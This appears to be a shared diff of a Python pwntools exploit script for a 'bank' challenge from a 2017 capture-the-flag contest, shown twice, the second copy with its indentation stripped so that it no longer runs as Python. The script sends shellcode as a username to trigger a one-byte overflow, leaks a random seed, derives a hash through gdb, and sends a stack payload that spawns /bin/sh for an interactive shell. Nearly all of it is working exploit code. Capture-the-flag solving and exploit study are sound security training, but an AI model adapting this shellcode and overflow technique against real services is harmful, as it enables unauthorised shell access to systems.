lionaneesh · September 16, 2017 09:43
diff --git a/pwn_bank_sect2017.py b/pwn_bank_sect2017.py
 from pwn import *
 import subprocess
 context(arch='amd64', os='linux', log_level='info')
 name_payload = asm("pop rax; push rsp; pop rcx; pop rdx; push rsp; pop rdi;syscall;")
 def get_treasure(r):
    #pass login and leak rand.
    print r.recvuntil("Username: ")
    r.send(name_payload) # 8 characters of input, 1 byte overflow.
    a = r.recvuntil('#> ')
    print a
    a = a.split("\n")
    x = 0
    while x < len(a):
        if a[x].startswith('Welcome'):
            #x += 1
            break
        x += 1
    print "raw : ",raw(a[x])
    treasure = a[x].strip().replace("Welcome "+name_payload, "")
    return treasure

 def raw(a):
    return a.encode('hex')

 r = process('./bank')
 #r = remote('pwn.sect.ctf.rocks', 31337)
 raw_input()
 treasure = get_treasure(r)
 print raw(treasure)
 treasure = int(treasure[::-1].encode('hex'), 16)

 print "got leak", treasure
 from subprocess import call
 fp = open("payload_bank", "wb")
 fp.write(name_payload+'2\nAAAAA\r\n')
 fp.close()
 d = subprocess.Popen("gdb -ex 'py seed = " + str(treasure) + "' -x ./bank_gdb.py ", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
 print d
 h = d.split("\n")[-1].strip().split(" ")[-1]
 r.send("2\n")
 r.recvuntil("Please enter your secure hash: ")
 r.send(h)

 rbp = 0xdeadbeef
 rip = 0x40000
 payload = "\x00" * 16 + p64(rbp) + p64(rip)
 payload += p64(0x3b)
 payload += p64(0)
 payload += "/bin/sh\x00"
 payload += "BBB"
 r.send(payload)
 r.interactive()
	from pwn import *
	import subprocess
	context(arch='amd64', os='linux', log_level='info')
	name_payload = asm("pop rax; push rsp; pop rcx; pop rdx; push rsp; pop rdi;syscall;")
	def get_treasure(r):
	#pass login and leak rand.
	print r.recvuntil("Username: ")
	r.send(name_payload) # 8 characters of input, 1 byte overflow.
	a = r.recvuntil('#> ')
	print a
	a = a.split("\n")
	x = 0
	while x < len(a):
	if a[x].startswith('Welcome'):
	#x += 1
	break
	x += 1
	print "raw : ",raw(a[x])
	treasure = a[x].strip().replace("Welcome "+name_payload, "")
	return treasure

	def raw(a):
	return a.encode('hex')

	r = process('./bank')
	#r = remote('pwn.sect.ctf.rocks', 31337)
	raw_input()
	treasure = get_treasure(r)
	print raw(treasure)
	treasure = int(treasure[::-1].encode('hex'), 16)

	print "got leak", treasure
	from subprocess import call
	fp = open("payload_bank", "wb")
	fp.write(name_payload+'2\nAAAAA\r\n')
	fp.close()
	d = subprocess.Popen("gdb -ex 'py seed = " + str(treasure) + "' -x ./bank_gdb.py ", shell=True, stdout=subprocess.PIPE).stdout.read().strip()
	print d
	h = d.split("\n")[-1].strip().split(" ")[-1]
	r.send("2\n")
	r.recvuntil("Please enter your secure hash: ")
	r.send(h)

	rbp = 0xdeadbeef
	rip = 0x40000
	payload = "\x00" * 16 + p64(rbp) + p64(rip)
	payload += p64(0x3b)
	payload += p64(0)
	payload += "/bin/sh\x00"
	payload += "BBB"
	r.send(payload)
	r.interactive()